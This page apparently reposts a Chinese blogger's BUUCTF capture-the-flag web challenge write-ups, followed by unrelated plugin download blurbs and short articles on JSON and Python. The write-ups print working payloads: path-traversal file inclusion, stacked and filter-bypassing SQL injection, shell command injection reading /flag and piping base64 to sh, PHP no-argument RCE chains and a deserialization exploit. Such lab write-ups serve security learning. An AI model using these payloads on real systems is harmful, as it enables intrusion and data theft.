前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[JavaScript中处理JSON时间戳...]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
转载文章
...联系我们,我们将第一时间进行核实并删除相应内容。 目录 [HCTF 2018]WarmUp [强网杯 2019]随便注 [SUCTF 2019]EasySQL [GYCTF2020]Blacklist [GKCTF2020]cve版签到 GXYCTF2019禁止套娃 [De1CTF 2019]SSRF Me [极客大挑战 2019]EasySQL [极客大挑战 2019]Havefun [极客大挑战 2019]Secret File [ACTF2020 新生赛]Include 2018]easy_tornado [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [RoarCTF 2019]Easy Calc [极客大挑战 2019]Knife [ACTF2020 新生赛]Exec [极客大挑战 2019]PHP [极客大挑战 2019]Http [HCTF 2018]admin [极客大挑战 2019]BabySQL [HCTF 2018]WarmUp 这里补充一个知识点:phpmyadmin 4.8.1任意文件包含 环境我已经启动了 去访问一下 源码有提示 去访问一下 然后看到了源码 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 这里白名单里给了一个提示 尝试直接去访问它 报错了… 尝试穿越目录去访问 依然报错了 看源码吧 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里是提供了两个白名单if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号,然后返回问号的位置,就是=4//所以想绕过这里,直接?flag,他检测到的问号就是0,然后0,0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话,empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入:1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 (为2) 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来,这个符号是 esc下面一个的按键,这个符号在mysql里 用于 分割其他命令,表示此为(表名、字段名) 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多 这里通过 MYSQL的预处理语句,使用 : concat('s','elect',' from 1919810931114514') 完成绕过 构造pyload: 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字,字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回,一种是空白,一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母(除过滤的关键词外)都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符,不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接,但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接,而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候,mysql也可以把 || 作为字符串拼接。 修改完后,|| 就会被认为是字符串拼接符 MySQL中sql_mode参数,具体的看这里 解题思路1: payload:,1 查询语句:select ,1||flag from Flag 解题思路2: 堆叠注入,使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
JQuery插件下载
...开发者设计的轻量级纯JavaScript货币格式化插件。它以简洁高效著称,提供了广泛的货币和语言支持,使得在网页上显示和操作货币数值变得更加便捷和准确。这款插件内置了155种不同国家的货币格式,覆盖了全球绝大多数的货币种类,无论是美元、欧元还是人民币等,都能得到精确的格式化输出。同时,它还支持715种不同的语言环境,确保了在不同地区展示货币时的本地化需求得到满足。使用currencyFormatter.js,开发者无需担心复杂的货币符号转换或数字格式问题,只需几行简单的代码调用,即可实现对输入数值的自动格式化,使其符合特定国家或地区的标准。此外,该插件还具备处理某些特殊货币格式的能力,比如对于那些不常用的货币单位,也能够进行正确的识别和格式化,极大地提升了应用的灵活性与适应性。无论你是正在开发国际化的电子商务网站,还是需要在多语言环境中展示金融数据的应用程序,currencyFormatter.js都是你的理想选择。其简洁明了的API设计和强大的功能集合,将帮助你轻松应对各种货币格式化的需求,提升用户体验的同时,也为项目带来了更高的专业度和可信度。 点我下载 文件大小:26.76 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-11-03 20:41:15
58
本站
JQuery插件下载
..."Day.js轻量级处理时间和日期JavaScript库",它提供了一个强大而简洁的时间和日期处理工具。Day.js库以极小的体积(仅2KB)实现了与广为人知的Moment.js相同的API设计,使得开发者能够无缝过渡并利用其功能。Day.js库专注于时间格式化与日期格式化,支持各种常见的日期操作任务,包括但不限于日期解析、格式化、添加或减去时间单位、比较日期等。无论你是需要将日期转换成特定格式,还是进行复杂的日期计算,Day.js都能轻松应对。此外,它还提供了丰富的插件系统,允许用户根据需要扩展其功能,满足更复杂的应用场景需求。对于熟悉Moment.js的开发者而言,使用Day.js几乎不需要额外的学习成本。你只需将现有的Moment.js代码稍作调整即可无缝切换至Day.js,享受其带来的高性能与低资源消耗。对于新手来说,Day.js同样易于上手,文档详尽且示例丰富,可以帮助快速掌握使用方法。总之,如果你正在寻找一款高效、灵活且易于集成的时间和日期处理解决方案,那么Day.js将是你的理想选择。它不仅能满足日常开发中的基本需求,还能通过插件机制轻松应对更多高级用例。无论是构建个人项目还是企业级应用,Day.js都是处理时间和日期问题时不可或缺的强大工具。 点我下载 文件大小:154.16 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-12-15 10:56:28
92
本站
JQuery插件下载
...le是一个功能强大的JavaScript插件,专为处理CSV格式文件而设计,能够轻松地将这些文件转换为直观的HTML表格形式,从而在网页上展示数据。该插件的核心优势在于其简洁性与易用性,无需依赖于复杂的库或框架,仅通过纯JavaScript代码实现,确保了高度的兼容性和灵活性。CsvToTable插件的使用过程非常直觉,开发者只需将目标CSV文件加载至插件中,即可自动解析文件内容并构建相应的HTML表格结构。这一过程不仅自动化程度高,而且效率显著,使得数据的可视化变得异常便捷。对于开发者而言,这意味着他们可以专注于业务逻辑的开发,而将数据处理的任务交给CsvToTable来完成,大大提升了开发效率和用户体验。此外,CsvToTable支持灵活的数据格式输入,无论是逗号分隔还是分号分隔的CSV文件,甚至包含特殊字符的文件,都可以被准确无误地解析并呈现为HTML表格。这种广泛的兼容性使得CsvToTable成为处理多种来源和格式数据的理想选择,适用于各种应用场景,从简单的数据分析到复杂的报表生成。总之,CsvToTable-CSV格式文件转HTML表格js插件以其简洁的API、高效的性能和出色的兼容性,为开发者提供了一个高效、可靠的工具,用于将CSV文件转换为HTML表格,极大地简化了数据展示的过程,提高了工作效率和用户体验。 点我下载 文件大小:10.69 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-08-23 10:42:51
98
本站
JQuery插件下载
....js是一款轻量级的JavaScript库,体积小于2KB,专门用于将标准的日期时间格式转换为用户友好的模糊时间描述。这款插件非常适合需要在网页上显示相对时间的应用场景,比如社交媒体、新闻网站或是任何需要实时更新时间信息的地方。通过使用timeago.js,开发者可以轻松地将复杂的日期时间数据转化为更加直观易懂的表述,如“3小时前”、“1天前”或“几分钟前”。这种人性化的时间表示方式不仅提升了用户体验,还简化了前端开发工作,无需编写繁琐的时间计算逻辑。timeago.js的设计目标是简洁与高效,它采用纯JavaScript实现,无需依赖任何其他库,这使得它可以无缝集成到现有的项目中,无论是大型企业应用还是小型个人网站。此外,该插件提供了丰富的配置选项,允许开发者根据具体需求自定义时间格式和样式,从而满足多样化的应用场景。总之,timeago.js是一个强大且灵活的时间转换工具,能够显著提升网页内容的时间表现形式,使信息展示更加生动、易读。对于追求高效开发流程和优化用户体验的开发者来说,这是一个不可多得的好帮手。 点我下载 文件大小:32.35 KB 您将下载一个JQuery插件资源包,该资源包内部文件的目录结构如下: 本网站提供JQuery插件下载功能,旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容,请立即告知我们,我们将迅速响应并删除相关内容。 免责声明:站内所有资源仅供个人学习研究及参考之用,严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果,由使用者承担责任。
2024-12-30 10:57:09
48
本站
JQuery
在前端开发中,字符串处理是不可或缺的一部分,而JavaScript原生提供的split()方法无疑是其中的关键工具。然而,在大型项目或更复杂的场景下,开发者可能需要更高级的字符串解析功能,例如处理嵌套分隔符、正则表达式匹配等。为此,可以关注近期发布的JavaScript库如lodash和ramda,它们提供了丰富的字符串操作函数,增强了对复杂字符串处理的能力。 举例来说,lodash库中的_.split()函数不仅支持基础的字符串分割,还能结合lodash的其他函数实现深度字符串处理逻辑。另外,对于CSV、JSON等特殊格式的字符串转换,可以借助于专门的数据处理库如papaparse(CSV)和json5(JSON),这些库能帮助开发者高效准确地将字符串内容转化为可进一步操作的数据结构。 同时,随着ES6及后续版本的发布,JavaScript语言本身也在不断强化对字符串操作的支持,诸如模板字面量、扩展运算符以及新增的String.prototype.matchAll()等方法,都为字符串处理提供了更为强大的内建能力。 因此,前端开发者在面对字符串分割问题时,除了掌握基础的split()方法之外,还应持续关注和学习现代JavaScript特性和相关工具库的发展,以便在实际项目中更加灵活高效地进行字符串处理。通过深入了解并合理运用这些资源,能够有效提升代码质量与开发效率,更好地应对各种前端开发挑战。
2023-12-16 18:58:28
409
逻辑鬼才
JSON
JSON , JavaScript Object Notation,是一种轻量级的数据交换格式。它基于纯文本,采用完全独立于语言的文本格式来存储和传输数据,易于人阅读和编写,同时也易于机器解析和生成。在本文中,JSON被用于PHP程序中进行前后端数据交互,通过json_decode函数可以将JSON字符串转换为PHP对象或数组,反之,通过json_encode函数可将PHP数组转换为JSON格式的字符串。 PHP对象 , 在PHP编程语言中,对象是一种复杂的数据类型,它是类的实例化结果,包含了数据(属性)和方法(功能)。在处理JSON时,通过json_decode函数将JSON数据转换为PHP对象后,可以通过“->”运算符访问其内部的属性,例如在文章示例中的 $data->name、$data->age 和 $data->city 就分别代表了从JSON数据转换得到的PHP对象的属性值。 前后端数据交互 , 在Web应用程序开发中,前后端数据交互是指客户端(前端,如浏览器中的JavaScript代码)与服务器端(后端,如PHP脚本)之间传递、接收和处理数据的过程。在这个过程中,JSON扮演着重要的角色,因为它的易读性和跨语言兼容性使得它可以作为不同环境间通用的数据交换格式。例如,在PHP环境中,通过将PHP数组编码成JSON格式发送给前端,或者将前端发送过来的JSON数据解码为PHP数组,实现数据的有效传递和共享。
2023-01-18 13:53:09
461
算法侠
Python
...发布和更新,开发者在处理数字验证时拥有了更多高效、安全的选择。例如,除了文中提到的isdigit()、isnumeric()及isdecimal()函数外,Python引入了zoneinfo模块以支持国际化时间处理,这使得在处理包含日期、时间戳等混合型数字格式的用户输入时更为精准。 同时,在大型项目中,为确保代码健壮性,推荐使用类型注解(Type Annotations)配合库如typeguard进行更严格的输入校验。Python 3.8及以上版本强化了类型提示功能,可以有效预防因类型错误导致的运行时异常,尤其对于涉及复杂数字结构如numpy数组或pandas DataFrame的数据验证具有重要意义。 此外,针对Web开发场景下的用户输入验证,框架Django和Flask提供了内置的表单验证机制,能够自动检查并转换用户提交的数字信息,极大地提升了开发效率和用户体验。 总的来说,Python在数字处理与验证方面持续优化和发展,开发者应紧跟社区动态,充分利用新特性与最佳实践,以提升应用程序的安全性和稳定性。
2023-01-16 10:24:29
404
软件工程师
HTML
